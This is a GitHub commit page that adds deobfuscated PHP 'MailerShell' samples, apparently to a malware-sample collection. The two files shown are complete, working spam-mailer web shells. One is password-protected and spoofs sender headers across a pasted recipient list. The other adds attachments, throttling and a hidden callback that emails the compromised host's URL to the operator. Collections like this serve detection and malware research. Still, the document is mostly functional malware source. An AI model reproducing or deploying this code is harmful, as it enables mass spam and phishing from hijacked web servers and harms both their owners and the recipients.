Upload new shells

bartblaze · Sep 4, 2016 · 0554c2f · 0554c2f
1 parent b3578c3
commit 0554c2f
Show file tree

Hide file tree

Showing 13 changed files with 5,236 additions and 0 deletions.
diff --git a/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php b/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php
diff --git a/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php b/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php
@@ -0,0 +1,114 @@
+<?php
+/* Sandy 2013 - Best Email Marketing Tool */
+set_time_limit(0);
+ignore_user_abort(true);
+
+        $ac = $_POST['ac'];                                                                                                                                                                                                     
+        $Verify=$_POST['Verify'];
+        $From=$_POST['From'];
+        $RealName=$_POST['RealName'];
+        $Subject=$_POST['Subject'];
+        $MailBody=$_POST['MailBody'];
+        $MailList=$_POST['MailList'];
+        $Format=$_POST['Format'];
+        $Encoding=$_POST['Encoding'];
+        $Delay=$_POST['Delay'];
+
+        $SandyKey=$_POST['SandyKey'];
+        $SandyNRA=$_POST['SandyNRA'];
+        $SandyNRB=$_POST['SandyNRB'];
+        $SandyRNA=$_POST['SandyRNA'];
+        $SandyRNB=$_POST['SandyRNB'];
+        $CodeSize=$_POST['CodeSize'];
+
+        $SANDY_SERVER=$_SERVER['SERVER_NAME'];
+
+/* Access Protection */
+  $protection="1af98609adf796b21c9fc735e31c57b7";
+  if(md5($Verify)!==$protection){ exit; }
+
+
+ if ($ac=="go"){
+  $MailBody = urlencode($MailBody);
+  $MailBody = ereg_replace("%5C%22", "%22", $MailBody);
+  $MailBody = urldecode($MailBody);
+  $MailBody = stripslashes($MailBody);
+  $Subject = stripslashes($Subject); }
+
+ if ($ac=="go"){
+ if (!$From && !$Subject && !$MailBody && !$MailList){
+ print "Fields missing.";
+ exit;
+ }
+  $allemails = split("\n", $MailList);
+  $nm = count($allemails);
+ for($x=0; $x<$nm; $x++){
+  $to = $allemails[$x];
+  $Dest = explode("/", $to);
+  $Destination = $Dest[0];
+
+ if ($Destination){                
+  $Destination = ereg_replace(" ", "", $Destination);
+  $MailBody = ereg_replace("&email&", $Destination, $MailBody);
+  $Subject = ereg_replace("&email&", $Destination, $Subject);
+  $nrmail=$x+1;
+  $domain = substr($From, strpos($From, "@"), strlen($From));
+
+  /* Template Zone */
+  $SANDY_NR = rand($SandyNRA,$SandyNRB);
+  $SANDY_RN = rand($SandyRNA,$SandyRNB);
+  $SANDY_HASH = md5("$Destination+$SandyKey");
+  $SANDY_CODE_LOWER = substr("$SANDY_HASH", $CodeSize);
+  $SANDY_CODE_UPPER = strtoupper($SANDY_CODE_LOWER);
+  $SANDY_NAME = $Dest[1];
+  $SANDY_UMAIL = base64_encode($Destination);
+
+  $From1 = str_replace("SANDY_NR", $SANDY_NR, $From);
+  $From2 = str_replace("SANDY_RN", $SANDY_RN, $From1);
+  $From3 = str_replace("SANDY_HASH", $SANDY_HASH, $From2);
+  $From4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $From3);
+  $From5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $From4);
+
+
+  $RealName1 = str_replace("SANDY_NR", $SANDY_NR, $RealName);
+  $RealName2 = str_replace("SANDY_RN", $SANDY_RN, $RealName1);
+  $RealName3 = str_replace("SANDY_HASH", $SANDY_HASH, $RealName2);
+  $RealName4 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $RealName3);
+  $RealName5 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $RealName4);
+
+  $MailBody1 = str_replace("SANDY_NR", $SANDY_NR, $MailBody);
+  $MailBody2 = str_replace("SANDY_RN", $SANDY_RN, $MailBody1);
+  $MailBody3 = str_replace("SANDY_HASH", $SANDY_HASH, $MailBody2);
+  $MailBody4 = str_replace("SANDY_NAME", $SANDY_NAME, $MailBody3);
+  $MailBody5 = str_replace("SANDY_DESTINATION", $Destination, $MailBody4);
+  $MailBody6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $MailBody5);
+  $MailBody7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $MailBody6);
+  $MailBody8 = str_replace("SANDY_UMAIL", $SANDY_UMAIL, $MailBody7); 
+
+
+  $Subject1 = str_replace("SANDY_NR", $SANDY_NR, $Subject);
+  $Subject2 = str_replace("SANDY_RN", $SANDY_RN, $Subject1);
+  $Subject3 = str_replace("SANDY_HASH", $SANDY_HASH, $Subject2);
+  $Subject4 = str_replace("SANDY_NAME", $SANDY_NAME, $Subject3);
+  $Subject5 = str_replace("SANDY_DESTINATION", $Destination, $Subject4);
+  $Subject6 = str_replace("SANDY_CODE_LOWER", $SANDY_CODE_LOWER, $Subject5);
+  $Subject7 = str_replace("SANDY_CODE_UPPER", $SANDY_CODE_UPPER, $Subject6);
+  $Subject8 = str_replace("SANDY_SERVER", $SANDY_SERVER, $Subject7);
+
+/* Sending Mail */
+ print "$nrmail:$nm:$Destination";
+ if($Delay != 0) { sleep($Delay); }
+ flush();
+  $header = "From: $RealName5 <$From5>\r\n";
+  $header .= "MIME-Version: 1.0\r\n";
+  $header .= "Content-Type: $Format\r\n";
+  $header .= "Content-Transfer-Encoding: $Encoding\r\n\r\n";
+  $header .= "$MailBody8\r\n";
+ mail($Destination, $Subject8, "", $header);
+ print "\n";
+ flush();
+    }
+  }
+}
+?>
+
diff --git a/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php b/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php
@@ -0,0 +1,268 @@
+<?
+error_reporting(E_ALL ^ E_NOTICE);
+function doset() {
+	if( !ini_get('safe_mode') )
+	{
+        set_time_limit(0);
+		ini_set("max_execution_time", 0);
+        ini_set("memory_limit", "256M");
+        ignore_user_abort(true);
+	}
+	else echo "this is a safe_mode one and will timeout.. cannot set_time_limit";
+	ob_start();
+}
+doset();
+
+
+if ($_POST['action']=="send"){
+
+        $message = urlencode($_POST['message']);
+
+        $message = ereg_replace("%5C%22", "%22", $message);
+
+        $message = urldecode($message);
+        $message = stripslashes($message);
+        $subject = stripslashes($_POST['subject']);
+
+}
+?>
+
+<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>" enctype="multipart/form-data">
+
+  <br>
+
+  <table width="100%" border="0">
+
+    <tr> 
+
+      <td width="10%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+
+          Email:</font></div>
+
+      </td>
+
+      <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="from" value="<? print $_POST['from']; ?>" size="30">
+
+        </font></td>
+
+      <td width="31%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+
+          Name:</font></div>
+
+      </td>
+
+      <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="realname" value="<? print $_POST['realname']; ?>" size="30">
+
+        </font></td>
+
+    </tr>
+
+    <tr> 
+
+      <td width="10%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
+
+      </td>
+
+      <td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="replyto" value="<? print $_POST['replyto']; ?>" size="30">
+
+        </font></td>
+
+      <td width="31%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+
+          File:</font></div>
+
+      </td>
+
+      <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="file" name="file" size="30">
+
+        </font></td>
+
+    </tr>
+
+    <tr> 
+
+      <td width="10%"> 
+
+        <div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
+
+      </td>
+
+      <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <input type="text" name="subject" value="<? print stripslashes($_POST['subject']); ?>" size="90">
+
+        </font></td>
+
+    </tr>
+
+    <tr valign="top"> 
+
+      <td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <textarea name="message" cols="60" rows="10"><? print stripslashes($_POST['message']); ?></textarea>
+
+        <br>
+
+        <input type="radio" name="contenttype" value="plain">
+
+        Plain 
+
+        <input type="radio" name="contenttype" value="html" checked>
+
+        HTML 
+
+        <input type="hidden" name="action" value="send">
+
+        <input type="submit" value="Send Message">
+
+        </font></td>
+
+      <td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+
+        <textarea name="emaillist" cols="30" rows="10"></textarea>
+
+        <br>
+        <input type="text" name="emailfinal" value="<? print $_POST['emailfinal']; ?>" size="22"> (EMAIL VERIFICARE)
+        </font></td>
+    </tr>
+  </table>
+  <p>La fiecare <input type="text" name="emailz" value="<? print $_POST['emailz']; ?>" size="3"> mailz, asteapta <input type="text" name="wait" value="<? print $_POST['wait']; ?>" size="3"> secunde<br></p>
+</form>
+
+
+
+<?
+
+if ($_POST['action']=="send"){
+        $message = urlencode($_POST['message']);
+
+        $message = ereg_replace("%5C%22", "%22", $message);
+
+        $message = urldecode($message);
+        $message = stripslashes($message);
+        $subject = stripslashes($_POST['subject']);
+
+
+        $from=$_POST['from'];
+        $realname=$_POST['realname'];
+        $replyto=$_POST['replyto'];
+
+
+        $emaillist=$_POST['emaillist'];
+
+        $contenttype=$_POST['contenttype'];
+
+
+        $allemails = split("\n", $emaillist);
+
+        $numemails = count($allemails);
+
+
+
+
+        #Open the file attachment if any, and base64_encode it for email transport
+		$file_name = $_FILES['file']['name'];
+		$file = $_FILES['file'];
+        if ($file_name){
+
+                @copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
+
+                $content = fread(fopen($file,"r"),filesize($file));
+
+                $content = chunk_split(base64_encode($content));
+
+                $uid = strtoupper(md5(uniqid(time())));
+
+                $name = basename($file);
+
+        }
+
+
+
+        for($x=0; $x<$numemails; $x++){
+
+                if($_POST['emailz'] && $_POST['wait'])
+                        if( fmod($x,$emailz) == 0 ) {
+                                echo "-------------------------------> SUNT LA emailul $x, astept $wait secunde.<br>";
+                                sleep($wait);
+                        }
+                $to = $allemails[$x];
+
+                if ($to){
+
+					$to = ereg_replace(" ", "", $to);
+					$to = trim($to);
+
+					$message = ereg_replace("&email&", $to, $message);
+
+					$subject = ereg_replace("&email&", $to, $subject);
+
+					print "Sending mail to $to.......";
+
+					flush();
+					ob_flush();
+
+					$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
+
+					$header .= "MIME-Version: 1.0\r\n";
+
+					if ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
+
+					if ($file_name) $header .= "--$uid\r\n";
+
+					$header .= "Content-Type: text/$contenttype\r\n";
+
+					$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
+
+					$header .= "$message\r\n";
+
+					if ($file_name) $header .= "--$uid\r\n";
+
+					if ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
+
+					if ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
+
+					if ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
+
+					if ($file_name) $header .= "$content\r\n";
+
+					if ($file_name) $header .= "--$uid--";
+
+					@mail($to, $subject, "", $header);
+
+					print " S-o dus<br>";
+
+					flush();
+					ob_flush();
+
+                }
+
+		}//end for
+
+		if( strpos($_POST['emailfinal'], "@") !== false){
+			@mail($_POST['emailfinal'], $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "test");
+		}
+                //$emaillist .= "\n". $_POST['emailfinal'];
+
+
+
+}
+
+
+?>